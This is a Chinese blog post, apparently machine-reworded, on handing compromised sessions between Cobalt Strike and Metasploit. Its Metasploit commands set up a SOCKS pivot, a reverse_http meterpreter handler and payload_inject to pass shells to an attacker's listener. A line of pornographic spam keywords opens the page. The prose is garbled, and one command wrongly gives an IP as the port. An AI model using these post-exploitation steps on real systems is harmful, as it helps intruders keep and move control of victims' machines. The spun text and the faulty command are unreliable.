亚洲精品久久国产精品37p,亚洲av无码av制服另类专区,午夜直播免费看,玩弄人妻少妇500系列视频,无码人妻久久久一区二区三区

Cobaltstrike與MSF對話繼承

序言

一般在滲入的全過程中,Get到shell以后一般來說我很喜歡發(fā)布到Cobaltstrike,可是Cobaltstrike的對話是60S升級一次,有時作用也并沒有MSF健全(我的軟件不足強大嘿嘿),那麼今天我提前準備紀錄一下怎樣完成Cobaltstrike與MSF的連動,而且在下面2~3篇文章內(nèi)容里,我提前準備主要講一下隧道施工技術(shù)性,尤其是SSH隧道施工技術(shù)性、SOCK4隧道施工技術(shù)性、SOCK5隧道施工技術(shù)性。

文章正文

Cobastrike構(gòu)建SockS隧道施工

最先Cobaltstrike獲得一個對話,隨后構(gòu)建SockS。

隨后再view里尋找Proxy Pivots,點一下Tunnel查詢網(wǎng)絡(luò)設(shè)置。

開啟Metasploit,設(shè)定Socks代理商

msf6 > setg Proxies socks4:192.168.37.129:8265 //設(shè)定走Cobaltstrike的代理商安全通道
Proxies => socks4:192.168.37.129:8265			
msf6 >  setg ReverseAllowProxy true				//設(shè)定容許雙重安全通道
ReverseAllowProxy => true
msf6 > use auxiliary/scanner/ip/ipidseq  		//設(shè)定找尋空余服務(wù)器
msf6 auxiliary(scanner/ip/ipidseq) > show options
msf6 auxiliary(scanner/ip/ipidseq) > set RHOSTS 192.168.37.128-135
RHOSTS => 192.168.37.128-135
msf6 auxiliary(scanner/ip/ipidseq) > run

發(fā)覺取得成功掃描儀到空余服務(wù)器:

Cobaltstrike繼承對話

當Cobaltstrike獲得到發(fā)布服務(wù)器后,有時必須傳送對話到MSF,實際操作以下:

最先創(chuàng)建新的Foreign HTTP竊聽器,設(shè)定IP為MSF接受的IP,設(shè)定Port是一會兒MSF監(jiān)視的端口號

隨后開啟MSF,設(shè)定好竊聽器:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload Windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.37.134
lhost => 192.168.37.134
msf6 exploit(multi/handler) > set lport 8088
lport => 8088
msf6 exploit(multi/handler) > run -j

隨后開啟Cobaltstrike,分享對話,方式 以下,在對話欄里挑選spawn,挑選payload為剛剛設(shè)定的MSFpayload,挑選Choose后Metasploit接受到對話。

Metasploit繼承對話

假如Metasploit早已獲得到一個對話,能夠根據(jù)payload_inject控制模塊開展對話繼承,將對話傳送到Cobaltstrike。

這兒我試著首先用MSF開展總流量數(shù)據(jù)加密,再開展對話繼承,實際可參考blog:https://www.cnblogs.com/culin/#/c/subject/p/15119863.html。

實際操作以下,最先Cobaltstrike創(chuàng)建新Becon HTTP的竊聽器,設(shè)定好監(jiān)視的IP和Port

隨后獲得到MSF的對話后,必須啟用payload_inject控制模塊,方式 以下

msf6> use exploit/windows/local/payload_inject 
msf6> set payload windows/meterpreter/reverse_http  //留意payload的配對
msf6> set session 2					//必須分享對話的SESSION
msf6> set lhost 192.168.34.129		//設(shè)定必須分享的IP
msf6> set lport 192.168.34.129 		//設(shè)定必須分享的port
msf6> run							//逐漸分享

能夠取得成功見到對話就分享成功了:

這時Cobaltstrike的對話也會被數(shù)據(jù)加密,更為的安全性一。

評論(0條)

刀客源碼 游客評論